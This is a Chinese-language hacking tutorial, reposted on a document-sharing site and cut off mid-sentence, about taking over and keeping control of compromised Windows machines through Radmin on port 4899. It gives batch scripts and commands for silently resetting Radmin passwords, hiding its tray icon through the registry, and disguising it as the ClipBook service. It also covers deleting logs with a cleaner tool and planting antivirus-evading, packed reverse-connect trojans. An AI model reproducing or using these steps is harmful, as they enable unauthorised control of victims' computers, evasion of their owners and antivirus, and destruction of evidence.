您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 销售管理 > RAdmin 服务端高级配置
对于4899肉鸡,相信大家都不会陌生吧。Radmin远程控制软件最大的优点就是功能齐全,便于操作,能够躲避一些软件的查杀。实在是居家旅行,杀人灭口,绝好武器。那么……有的朋友要问了多么好的宝马良驹在哪里可以找到啊?问的好,各大黑客网站均能下载,童叟无欺啊!(这段对白怎么这么耳熟啊?)第一章4899空口令肉鸡争夺战4899空口令肉鸡是由一些超级菜鸟们用WindowsNT/2000自动攻击探测机对他感兴趣的某段IP细心的,无微不至的扫描孕育而生的~~~(鼓掌,有请我们今天的主角,4899空口令肉鸡隆重登场,哎呀,谁拿西红柿扔我?忒不讲公德呢?扔也不扔个红的,绿的怎么吃啊?)既然4899空口令肉鸡这个多,那么偶就先从它的由来说起吧!WindowsNT/2000自动攻击探测机这款扫描软件不但集成了扫描器的特点,还添加了一些漏洞的利用功能。它能够对扫描出IIS溢出的,弱口令的和SA空口令的电脑上传并安装远程图形控制软件Radmin,即把R_Server.exe,AdmDll.dll和raddrv.dll这三个文件上传到其电脑系统跟目录%systemroot%\system32子目录下,并行运行R_Server.exe可执行文件。由于远程上传的Radmin没有经过配置,因此在对方机子的任务栏里出现了Radmin服务程序的托盘(如图1-1)。这样不就成个此地无银三百两,机器的主人一定能发现这个不正常的托盘。我想他第一个动作就是把鼠标移动到托盘位置,一点就显示出了有某某IP正在连接本机。如果是个只知道上网聊天的MM她第一个动作就是把网断了,逃过别人的控制再说。如果是个有经验的老鸟那么各位就要小心了,他会通过显示出的IP查到你的电脑或者你用来扫描的肉鸡,这样就大大的不妙了。所以了,这个托盘的隐藏是非常必要和急切的。在做我们的工作之前,要做好一些准备活动。首先把4899空口令肉鸡设置上密码,在Radmin的CMD控件下输入命令r_server.exe/port:520/pass:hackbase/save/silence。有些同僚总是抱怨这个命令不好用,我看过他们出问题的动画。无论是在CMD命令下或者在“运行”下输入这个命令都是正确的,而他们出错的原因就是没有添加参数“/save”保存,和参数“/silence”后台安装。这样设置好连接端口和密码,同道中人就算用“4899空口令扫描器”扫到你做的肉鸡也晚了,偶已经添加过密码了,而端口在肉鸡重起后能够修改成功。接下来我们就要把一个反弹木马放到肉鸡上,以免对方是动态IP,肉鸡就飞掉了。这里我们可以用灰鸽子VIP或黑洞2004这两个反弹木马都很不错的哦~~~。顺便说一句您的木马一定要做过特征码修改或者加壳啊,这样能够躲避对方杀毒软件的查杀。在这里再说句题外话对木马加壳不是加的壳越多就越安全的,这样大家就走入了多加壳的误区。这样不但不能躲过杀毒软件的查杀,还有可能使木马的功能受到影响。对喜欢加壳躲杀毒软件的朋友偶建议下先把木马脱壳,然后再加个不知名的壳(ASPack,UPX这些加壳软件的壳已经被有些杀毒软件列入黑客程序列表了),然后在用几款世面流行的杀毒软件在本地机器事先做个放杀毒检测。这样的黑客程序才是我们的杀手锏。前期工作制作完毕后,您就可以耐心的工作了。为了做到隐藏托盘的目的,偶想了两个办法:第一,在您的机器上事先安装并配置好Radmin,把注册表中的HKEY_LOCAL_MACHINE\SYSTEM\RAdmin导出为radmin.reg,这个就是绝对符合您意愿的Radmin配置,把radmin.reg上传到对方机器输入命令regedit/sradmin.reg。这样在机器重起或者您帮助他重起Radmin服务的时候,任务栏里的Radmin托盘就消失了。第二,写个批处理文件重新调整Radmin配置。批处理文件内容如下:@echooff@r_server.exe/port:520/pass:hackbase/save/silenceechoWindowsRegistryEditorVersion5.00ftp.regecho[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]ftp.regechoDisableTrayIcon=hex:01,00,00,00ftp.regregedit/sftp.regdelftp.reg到这里菜鸟的“保鸡”反击战已经告一段落。刚才我们不是还放了个灰鸽子吗,这样这台肉鸡上就有我们的两匹宝马良驹了。小样让你跑,还是逃不出如来佛的掌心吧!呵呵,我得意的笑~~~在长期的摸索研究工作中,偶发现个WindowsNT/2000自动攻击探测机的小BUG。等偶慢慢道来,各位看官听仔细啊。Radmin3.0影子版的客户端是Radmin公司开发的,而服务端程序缺因为种种原因,没有和各位见面。有的说是Radmin公司在开发新的功能,服务端没有开发完;有的说Radmin公司现在只对付费用户提供服务端,这些偶就不得而知了。可是我们敬爱的影子为我们制造出了“Radmin3.0服务端”其本质就是2.0版本的部分修改,对其图标做了修改和加壳处理。可是在汉化过程中,不知道什么原因,它在任务栏里的Radmin托盘变成了一个空白的地方,要是不注意是看不出来的(如图1-2、1-3)。所以了,我们在运行WindowsNT/2000自动攻击探测机扫描机子的时候,把它同目录下释放出来的R_Server.exe,替换成3.0版本的R_Server.exe。这样扫描出来上传图形控制软件的机器,在其任务栏里就出现了一个空白的地方。当把鼠标点到上面的时候也没有了某某IP正在连接的提示,这样就欺骗了一些机主。呵呵,旁门左道大家不要见笑啊。可是这个小BUG启发了我的另一个思路,就是把我们的Radmin.exe自动运行的配置包重命名为R_Server.exe,然后替换掉R_Server.exe,我们不就有了所以自己的机子了吗?好,说干就干。把我的Radmin自解压包替换掉R_Server.exe,可是这回WindowsNT/2000自动攻击探测机就没有了上传成功的小提示。(如图:1-4)(广告过后更精彩)我一直对这个验证方法不甚了解,想找作者问问,可是他老人家还换QQ了。哪位高手有高见,请不吝赐教,偶的QQ:9500142。言归正传,那也难不倒我,我们把扫描出来有漏洞的所有IP复制到一个文本文件中,用superscan导入IP列表,扫描我设置Radmin服务的端口,这样被我上传Radmin的机器就都上门报道了。Yeah!(如图:1-5)第二章Radmin服务端高级配置既然我们对Radmin这么情有独钟,那么我们就要打造不死系的超级后门木马。具推断当前安装过Radmin控制软件的肉鸡占安全性低级的电脑的80%左右,所以我们上传木马之前,要把其系统中可能存在的Radmin服务停止掉,替换成我们的服务为己所用。绝大部分的安装Radmin的肉鸡都是用的R_Server.exe程序。可是种植的原始情况分为两种:第一就如上面所说那样,是用WindowsNT/2000自动攻击探测机上传安装的,其安装服务的名称为“radmm”。启动和停止该服务的命令分别为“netstartradmm”和“netstopradmm”。第二一些喜欢偷懒的朋友,把自己的Radmin是默认的R_Server.exe程序,其安装服务的名称为“RemoteAdministratorService”。启动和停止该服务的命令分别为“netstartr_server”和“netstopr_server”。偶发现一个对付这两种配置的小窍门,就是可以用“r_server.exe/start”和“r_server.exe/stop”启动和停止服务,然后我们在替换为自己的配置。FollowMe!对配置Radmin自解压程序的,我有两个思路可供大家参详,希望对您能配置能够有所启发和帮助.第一就是替换系统服务的方法。如果您对Windows系统服务的工作机理不甚了解,那么请跳过这里,看接下来的第二种配置.1、编写一个批处理文件,命名为first.bat--------------------------------------------@echooffr_server.exe/stop--------------------------------------------这样做是假定肉鸡上已经由黑友安装过Radmin服务,杀无赦。2、接下来我拿系统的ClipBook服务开刀做下替换。编写一个批处理文件,命名为baby.bat--------------------------------------------@echooff@scstopClipBook@scdeleteClipBook@scstopr_server@del%systemroot%\system32\AdmDll.dll@del%systemroot%\system32\raddrv.dll@del%systemroot%\system32\R_Server.exe@del%systemroot%\system32\dllcache\ClipSrv.exe@del%systemroot%\system32\ClipSrv.exe@copy%systemroot%\system32\Setup\ClipSrv.exe%systemroot%\system32\ClipSrv.exe@copy%systemroot%\system32\Setup\raddrv.dll%systemroot%\system32\raddrv.dll@copy%systemroot%\system32\Setup\AdmDll.dll%systemroot%\system32\AdmDll.dll@ClipSrv.exe/install/silence@regedit/sradmin.reg@regedit/sserver.reg@scconfigClipBookstart=auto@scstartClipBook@scdeleter_server@delradmin.reg@delserver.reg@delsc.exe@clss.exe@cls@delbaby.exe@shutdown.exe-f-r@delfirst.bat@delbaby.bat@delclss.exe@delshutdown.exe--------------------------------------------Radmin.reg注册表文件时服务配置,Sc是微软服务修改程序(比尔其实对我们还满不错的哦,嘿嘿),clss.exe是日志清除工具(大家要养成勤扫地的习惯噢!),shutdown.exe是关机程序,这个程序无关紧要,关键看您的性子怎么样了(急性子的黑友建议使用)。Server.reg就是ClipBook服务的描述信息了,要伪装当然要做的够专业啊。WindowsRegistryEditorVersion5.00[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv]Description=启用“剪贴簿查看器”储存信息并与远程计算机共享。如果此服务终止,“剪贴簿查看器”将无法与远程计算机共享信息。如果此服务被禁用,任何依赖它的服务将无法启动。DisplayName=ClipBook上面的信息是由原ClipBook服务所对应的注册表键值[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ClipSrv]提取出来的。因为分支包含了部分电脑路径和安全信息,每个电脑都有些许区别,所以把精炼的东西提取出来做为我们的伪装信息。然后,把我们所用到的工具、注册表文件、批处理文件打包。配置RAR高级自解压格式所选项嘀时候,注意那个解压路径写成%systemroot%\syste
本文标题:RAdmin 服务端高级配置
链接地址:https://www.777doc.com/doc-1580111 .html